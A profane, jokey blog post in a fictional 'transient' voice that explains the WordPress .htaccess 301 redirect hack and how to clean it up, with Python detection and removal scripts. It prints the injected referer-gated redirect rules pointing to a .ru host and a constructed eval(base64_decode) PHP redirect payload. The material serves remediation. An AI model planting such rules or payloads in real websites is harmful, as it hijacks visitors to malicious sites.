Greetings Arkham. Given the tragedy perpetrated this week by a psychopath using my moniker, I've decided to defer today's political tirade in favor of news from a transient I met during one of my more recent "escapes". We both had a 6 hour lay-over in a Greyhound bus station when the topic came up regarding the 301 redirect hack plaguing WordPress users these days. Well, one thing led to another, so for a bottle of Jack and a little weed, I gave him a laptop and let him figure out this 2014reltime.ru 301 redirect thing. IT is not my forte...I'm more of a mayhem kind of guy and took his word for it. Below is what he wrote...before he got drunk and passed out, that is. So I'll pass on my usual social commentary out of respect....unlike the rest of those crazy satire writers out there anxious to be "timely". Funny I'm locked up as "crazy", and these fuckers are running amok at the keyboard with as much empathy as a serial killer and less ad revenue. Just goes to show: crazy is relative and some people just don't get comedy anymore. AH, HA, HAA, HAAA! Now that's funny....
A Transient in a Greyhound bus station explains the 2014Reltime.ru 301 redirect.
I don't know anything about computers, OK? But they tell me you think you have a 301 redirect in your .htaccess file to http://2014-reltimes.ru/tyorem?13. If a search user clicks your link in the Google search results and gets warned that the website is infected, you probably do. And there goes your traffic. A lot of the time, the first sign of infection is watching your traffic plummet (for reasons other than lame content, that is). Now that your site is on Google's blacklist, you'll need to request a malware review once it's clean. Pissed off yet?
If this reminds you of the kirm-sky.ru attack from a couple of years ago, you need a hobby, but you'd be correct. Compromised sites redirect search engine traffic to malicious sites. The rest of the traffic (direct visits, bookmarks, you typing your own URL) is not affected, which hides the problem from webmasters who never click search results to open their own sites. So what does the .htaccess look like? Hackers inject the following rewrite rules into .htaccess files:
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*tellmewherethepornis.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*baidu.* [OR]
RewriteCond %{HTTP_REFERER} .*youtube.* [OR]
RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR]
RewriteCond %{HTTP_REFERER} .*qq.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*iamalittleteapot.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*reefermadness.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.* [OR]
RewriteCond %{HTTP_REFERER} .*facebook.* [OR]
RewriteCond %{HTTP_REFERER} .*twitter.* [OR]
RewriteCond %{HTTP_REFERER} .*blog.* [OR]
RewriteCond %{HTTP_REFERER} .*live.* [OR]
RewriteCond %{HTTP_REFERER} .*myspace.* [OR]
RewriteCond %{HTTP_REFERER} .*mail.* [OR]
RewriteCond %{HTTP_REFERER} .*yandex.* [OR]
RewriteCond %{HTTP_REFERER} .*rambler.* [OR]
RewriteCond %{HTTP_REFERER} .*ya.* [OR]
RewriteCond %{HTTP_REFERER} .*strangleCorp.* [OR]
RewriteCond %{HTTP_REFERER} .*aport.* [OR]
RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]
RewriteCond %{HTTP_REFERER} .*flickr.*
RewriteRule ^(.*)$ http://networkdevision .ru/targetfile/index.php [R=301,L]
To hide these rules, the bastards usually inject several screens of blank lines before the malicious code, so you have to scroll all the way down to find anything suspicious in the .htaccess file. They might even place the file above the site root: Apache still reads .htaccess files from parent directories (wherever AllowOverride permits it), so the rules apply and nobody thinks to look there.
Those RewriteCond lines check whether a visitor came from one of those sites (Google, Yahoo, Wikipedia, YouTube, Twitter, Flickr, PornBonanza, etc.), and the last RewriteRule line redirects them to a malicious site. URLs of the malicious sites change quite often, but they all follow the pattern Numbnuts.ru/dir/index.php, where Numbnuts.ru is some malicious damned domain that needs to be kicked in the nuts. Judging by the "ru" in http://2014-reltimes.ru/tyorem?13, those assholes live in Russia (or at least registered a .ru domain; a TLD proves nothing about where anyone actually sits). Sucuri could have told you that, but where's the thrill in that?
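Since the redirect only fires for visitors with a search-engine Referer, reading the file is more reliable than clicking around. The script below is an added example (not the transient's code, and not from Sucuri): it scans .htaccess files in the docroot, every subdirectory and the directory one level above it, flags any RewriteRule that sends referer-gated traffic to a host that isn't yours, and reports how many blank lines pad the top of the file so you know how far to scroll. The sample .htaccess and the target host evil.example are constructed for the demo.

```python
"""Scan .htaccess files for referer-gated off-site redirects (added example)."""
import os
import re
import tempfile

# Constructed sample: 60 blank lines of padding, then the injected block.
# evil.example is a made-up target (the .example TLD is reserved).
SAMPLE_HTACCESS = "\n" * 60 + """RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.*
RewriteRule ^(.*)$ http://evil.example/dir/index.php [R=301,L]
"""

COND_RE = re.compile(r"^\s*RewriteCond\s+%\{HTTP_REFERER\}\s+(\S+)", re.I)
# An absolute URL as the substitution is an external redirect in mod_rewrite
# whether or not an R= flag is present, so the flag group is optional.
RULE_RE = re.compile(
    r"^\s*RewriteRule\s+\S+\s+(https?://[^\s/]+)\S*(?:\s*\[([^\]]*)\])?", re.I)


def find_referer_redirects(text, own_hosts=()):
    """Return one finding per RewriteRule that follows at least one RewriteCond
    on HTTP_REFERER and points at a host not listed in own_hosts."""
    lines = text.splitlines()
    padding = 0                      # blank lines before the first directive
    for line in lines:
        if line.strip():
            break
        padding += 1
    findings = []
    referer_conds = 0
    for lineno, line in enumerate(lines, start=1):
        if COND_RE.match(line):
            referer_conds += 1
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        host = m.group(1).split("://", 1)[1].lower()
        if referer_conds and host not in own_hosts:
            findings.append({"line": lineno, "host": host,
                             "referer_conds": referer_conds,
                             "flags": m.group(2) or "", "padding": padding})
        referer_conds = 0            # conditions only bind to the next rule
    return findings


def scan_site(docroot, own_hosts=()):
    """Map .htaccess path -> findings for the docroot tree plus its parent dir."""
    docroot = os.path.abspath(docroot)
    candidates = [os.path.join(os.path.dirname(docroot), ".htaccess")]
    for dirpath, _dirs, files in os.walk(docroot):
        if ".htaccess" in files:
            candidates.append(os.path.join(dirpath, ".htaccess"))
    results = {}
    for path in candidates:
        if not os.path.isfile(path):
            continue
        with open(path, encoding="utf-8", errors="replace") as fh:
            found = find_referer_redirects(fh.read(), own_hosts)
        if found:
            results[path] = found
    return results


def demo():
    """Plant the sample one level above a throwaway docroot, scan, and return
    the number of flagged files (the clean WordPress .htaccess is ignored)."""
    with tempfile.TemporaryDirectory() as tmp:
        docroot = os.path.join(tmp, "public_html")
        os.makedirs(os.path.join(docroot, "wp-content"))
        with open(os.path.join(tmp, ".htaccess"), "w") as fh:
            fh.write(SAMPLE_HTACCESS)
        with open(os.path.join(docroot, ".htaccess"), "w") as fh:   # ordinary WP rules
            fh.write("RewriteEngine On\nRewriteRule ^index\\.php$ - [L]\n"
                     "RewriteRule . /index.php [L]\n")
        results = scan_site(docroot, own_hosts=("www.example.com",))
        for path, found in results.items():
            for f in found:
                print(f"{path}: line {f['line']} -> {f['host']} "
                      f"[{f['flags']}] after {f['referer_conds']} referer "
                      f"conditions, {f['padding']} blank lines of padding")
        return len(results)


if __name__ == "__main__":
    demo()
```

To confirm the redirect from outside, send the same request twice with curl, once with a spoofed search referer (`curl -sI -e 'https://www.google.com/' https://www.example.com/`) and once without: the first comes back 301 to the off-site host, the second 200 from your own server.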
The domains are registered in small batches, but you can identify them by their similar names because the architects of this scam are just that unimaginative. They change the domain names of the malicious sites, as well as the IP addresses of the servers hosting the malicious content, after people complain and network administrators disconnect their servers. Then they just move on to the next one and diversify their infection methods like a crack whore. Most times the domain was created mere days before you caught the cyber-clap anyway, which a whois lookup on the redirect target will confirm.
Sometimes hosting providers temporarily shut down infected websites and redirect visitors to a page saying the site is temporarily unavailable. But that redirect has a lower priority than the malicious redirect in the .htaccess file, so in spite of everyone's best efforts, such disabled sites are still dangerous if people click their links. Same way a dead snake can still kill you. If you delete the .htaccess file, it re-appears faster than someone you owe money. Then it breaks your permalinks like a bookie breaks kneecaps. So you limp back in, re-save the permalinks and fix the problem... only to have a new .htaccess file created immediately; something on the server is rewriting it for you. You might also notice that an FTP server process is still running in the task manager even though you closed it, and you can't shut it down. Son-of-a-bitch!
What is this thing doing? First it harshes your buzz, then the .htaccess is modified to redirect users to some Russian site. Finally, a backdoor is created. It can be inside /js/conf.php, or at /flops.php if it's an osCommerce site. Try removing file_manager.php from the admin directory. If it's a WordPress hack, find the file _cache.php and erase it (like maybe wp-content/upload/_cache.php). Until the backdoor is gone, everything you clean comes right back.
In some cases the redirect code can be in any of your PHP files. Search them for the keywords eval and base64_decode. Go to the WordPress install directory and look at any .php file, since this crappy hack puts code right at the beginning of all the files, followed by a string of letters that goes on and on...
Those letters are a command, encoded to hide it. base64_decode turns the letters back into the command (the redirect), and eval runs it. The easiest fix I've heard of, if you have shell access, is to log into your server, change to the WordPress directory, and run this command:

find . -iname "*.php" -exec sed -i "s/^..php .\*\*.eval.base64_decode.\"aWYoZnVuY[^>]*>//" {} \;

This bit of code looks for all .php files in the current directory (and below), searches them for the malicious code, then kicks its ass. It should not interfere with any other code... unless the code wants to be interfered with, that is, then it's consensual. Two cautions: sed -i edits in place with no backup, so copy the tree first, and the pattern only matches a payload whose base64 starts with aWYoZnVuY, so grep for eval(base64_decode afterwards to catch variants.
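A less blind version of that clean-up, as an added example (not the transient's command and not from the linked blog): it finds PHP files that start with the same `<?php /**/ eval(base64_decode("...")); ?>` prefix the sed pattern targets, decodes the base64 so you can see what the payload actually does before deleting it, and keeps a .bak copy of every file it rewrites. The sample payload, the plugin path and the host evil.example are constructed for the demo; the only thing borrowed from the page is that a payload beginning `if(func...` base64-encodes to `aWYoZnVuY...`.

```python
"""Find, decode and strip the base64/eval prefix injected into PHP files
(added example; a safer stand-in for the sed one-liner above)."""
import base64
import os
import re
import shutil
import tempfile

# Same shape the sed pattern targets, but any base64 string, not one prefix.
INJECT_RE = re.compile(
    r'^<\?php\s*/\*\*/\s*eval\(base64_decode\("([A-Za-z0-9+/=]+)"\)\);\s*\?>\s*')

# Constructed sample payload (evil.example is a made-up host). Its base64
# begins with aWYoZnVuY, the fragment the sed command keys on.
SAMPLE_PAYLOAD = (b'if(function_exists("header")){'
                  b'header("Location: http://evil.example/dir/index.php");exit;}')
SAMPLE_INJECTED = ('<?php /**/eval(base64_decode("'
                   + base64.b64encode(SAMPLE_PAYLOAD).decode() + '"));?>\n'
                   '<?php\n// legitimate plugin code\necho "hello";\n')


def split_injected_prefix(src):
    """Return (decoded payload or None, source with the prefix removed)."""
    m = INJECT_RE.match(src)
    if not m:
        return None, src
    try:
        payload = base64.b64decode(m.group(1), validate=True)
    except ValueError:               # binascii.Error is a ValueError
        payload = b"<not valid base64>"
    return payload, src[m.end():]


def clean_file(path, apply=False):
    """Inspect one file; rewrite it (keeping a .bak copy) only when apply=True."""
    with open(path, encoding="utf-8", errors="surrogateescape") as fh:
        src = fh.read()
    payload, cleaned = split_injected_prefix(src)
    if payload is None:
        return None
    if apply:
        shutil.copy2(path, path + ".bak")
        with open(path, "w", encoding="utf-8", errors="surrogateescape") as fh:
            fh.write(cleaned)
    return payload


def clean_tree(root, apply=False):
    """Walk root for *.php files; return {path: decoded payload} for each hit."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(".php"):
                path = os.path.join(dirpath, name)
                payload = clean_file(path, apply)
                if payload is not None:
                    hits[path] = payload
    return hits


def demo():
    """Plant the sample in a temp tree, dry-run, then apply. Returns
    (files flagged, decoded payload, first line after cleaning, backup exists)."""
    with tempfile.TemporaryDirectory() as tmp:
        plugin = os.path.join(tmp, "wp-content", "plugins", "x")
        os.makedirs(plugin)
        victim = os.path.join(plugin, "x.php")
        with open(victim, "w") as fh:
            fh.write(SAMPLE_INJECTED)
        with open(os.path.join(tmp, "wp-config.php"), "w") as fh:  # clean file
            fh.write("<?php\ndefine('DB_NAME', 'wp');\n")
        hits = clean_tree(tmp)                 # dry run: nothing is written
        for path, payload in hits.items():
            print(f"{path}: {payload.decode(errors='replace')}")
        clean_tree(tmp, apply=True)            # strip the prefix, keep .bak
        with open(victim) as fh:
            first_line = fh.readline().rstrip("\n")
        return (len(hits), hits[victim].decode(), first_line,
                os.path.exists(victim + ".bak"))


if __name__ == "__main__":
    print(demo())
```

Run it dry first and read the decoded payloads: if one does more than set a Location header (writes files, phones home, re-creates .htaccess), you have found the thing that keeps resurrecting the redirect and should deal with it before bothering with permalinks.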
If that's too complex or you don't have shell access, try erasing all the .htaccess files and replacing them with new empty ones. That MIGHT work. To keep it from happening again, place your authentication files above the root directory so they cannot be reached by a browser, and get rid of the backdoor or it will all come back. Otherwise, visit any of the assorted help forums addressing this issue (unless their traffic is being redirected too). You are not alone, and some of these people actually know stuff, like here: http://25yearsofprogramming.com/blog/20070705.htm. As for me, I'm just a transient in a bus station wasting time. What in the hell are you listening to me for anyway?